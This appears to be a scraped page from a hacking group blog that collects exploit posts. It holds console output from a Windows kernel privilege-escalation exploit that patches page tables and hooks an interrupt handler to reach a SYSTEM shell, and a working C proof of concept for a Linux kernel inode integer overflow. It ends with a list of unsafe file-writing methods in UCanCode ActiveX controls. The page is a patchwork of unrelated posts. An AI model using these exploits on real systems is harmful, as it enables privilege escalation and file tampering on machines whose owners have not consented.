000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`.
000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8......
000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8......
000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?....
000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............
000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?.............
000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5.....
000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G.....
000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c.......
000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............
000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W.............
000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*....
000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............
000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!.............
000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c.......
000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | c@..............
000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8......
000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c.......
+] Selected spurious PML4E: fffff67b3d9ecf00
+] Spurious PT: fffff67b3d9e0000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
+] Patching the Spurious Offset with 1967
Original HalpIntteruptRequest pointer: fffff80150e1fc40
+] Selected spurious PML4E: fffff67b3d9ecf08
+] Spurious PT: fffff67b3d9e1000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
*** Patching the original location to enable NX...
+] Patching the Spurious Offset with 1967
HAL address: fffff67b3d9e1000
+] w00t: Shellcode stored at: ffffffffffd00d50
+] Selected spurious PML4E: fffff67b3d9ecf10
+] Spurious PT: fffff67b3d9e2000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
+] Patching the Spurious Offset with 1967
Patch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\qa\Desktop>
C:\Users\qa\Desktop>whoami
nt authority\system
C:\Users\qa\Desktop>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863292510
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
/* Linux Kernel 2.6.32-642 / 3.16.0-4 'inode' Integer Overflow PoC
The inode is a data structure in a Unix-style file system which describes a filesystem
object such as a file or a directory. Each inode stores the attributes and disk block
locations of the object's data. Filesystem object attributes may include metadata, as
well as owner and permission data.
INODE can be overflowed by mapping a single file too many times, allowing for a local
user to possibly gain root access.
Disclaimer:
This or previous program is for Educational purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the information or functionality provided
by these programs. The author or any Internet provider bears NO responsibility for content
or misuse of these programs or any derivatives thereof. By using these programs you accept
the fac that any damage (dataloss, system crash, system compromise, etc.) caused by the use
of these programs is not Todor Donev's responsibility.
Thanks to Maya Hristova and all friends.
Suggestions,comments and job offers are welcome!
Copyright 2016 (c) Todor Donev
Varna, Bulgaria
todor.donev@gmail.com
https://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
http://pastebin.com/u/hackerscommunity
*/
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
void main(){
int fd, i;
fd = open("/dev/zero", O_RDONLY);
for(i = 0; i < 26999; i++){
mmap((char*)0x00000000 + (0x10000 * i), 1, PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
}
}
UCanCode multiple vulnerabilities
Url: http://www.hmi-software.com/
http://www.ucancode.net/index.htm
http://www.ucancode.net/bbs/zhuce/login.htm
Description: Form vendor's web page "UCanCode Software is a Market Leading provider of HMI & SCADA, CAD, UML, GIS, Vector Graphics
and Real Time Data Visualization Graphics Source Code Kits for C/C++ and .NET software developers more than 40 countries
around the world!"
Great... 40 countries. It's time to take a look to their software!
Package name "UCanCode_Controls.zip"
After the installation, we can found these activex controls:
---------------------------------------------
ProgID: UCCVIEWER.UCCViewerCtrl.1
CLSID: {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
---------------------------------------------
ProgID: UCCDRAW.UCCDrawCtrl.1
CLSID: {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
---------------------------------------------
progID: TKDRAWCAD.TKDrawCADCtrl.1
CLSID: {9022B790-B810-45B4-80BC-2D94EEC5343C}
---------------------------------------------
ProgID: UCCPRINT.UCCPrintCtrl.1
CLSID: {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
---------------------------------------------
ProgID: UCCDIAGRAM.UCCDiagramCtrl.1
CLSID: {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
---------------------------------------------
ProgID: UCCUML.UCCUMLCtrl.1
CLSID: {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
---------------------------------------------
ProgID: UCCHMI.UCCHMICtrl.1
CLSID: {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
---------------------------------------------
ProgID: UCCSIMPLE.UCCSIMPLECtrl.1
CLSID: {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
---------------------------------------------
and all are marked as: RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------
INSECURE METHODS:
In these coontrols there are a lot of insecure methods which can be used to overwrite
arbitrary files in user's pc. This is the complete list:
1) various Export* methods
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function ExportBitmapData (ByRef phBlob As Long, ByVal imageShape As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function ExportToBitmapFile (ByVal lpszFile As String) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
2) various Save* methods:
----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
